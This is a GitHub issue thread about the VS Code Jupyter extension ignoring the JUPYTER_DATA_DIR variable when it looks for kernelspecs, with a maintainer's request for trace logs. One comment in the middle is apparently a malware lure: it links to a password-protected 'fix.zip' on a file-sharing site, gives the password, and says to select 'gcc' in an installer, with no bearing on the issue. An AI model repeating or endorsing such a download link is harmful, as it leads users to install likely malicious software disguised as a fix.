### ISSUE TITLE
Respect JUPYTER_DATA_DIR for kernelspec location

### ISSUE THREAD

**Issue by mallport** [microsoft/vscode-jupyter#15958]
As described in the [Jupyter documentation](https://docs.jupyter.org/en/latest/use/jupyter-directories.html#envvar-JUPYTER_DATA_DIR), the location for kernels and other data files can be overridden to use a custom path with the env variable `JUPYTER_DATA_DIR`. However, this extension only looks for kernelspec in a hard-coded path depending on the platform (found [here](https://github.com/microsoft/vscode-jupyter/blob/2a11eb0be0db775560232006cd86d67dfcee3a11/build/installDenoKernel.ts#L10)). This causes kernelspecs to not be found by this extension in this location. 

I think the extension should overwrite the default location if the environment variable is set.

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DonJayamanne** [comment]
Please could you enable logging as follows:
* Open settings & go into `Jupyter->Logging`
* Change the value to `trace`
* Reload VS Code,
* Attempt to repro the issue & then copy the output from the `Jupyter` output panel (use the command `Jupyter: Show Output` to get to the logs).
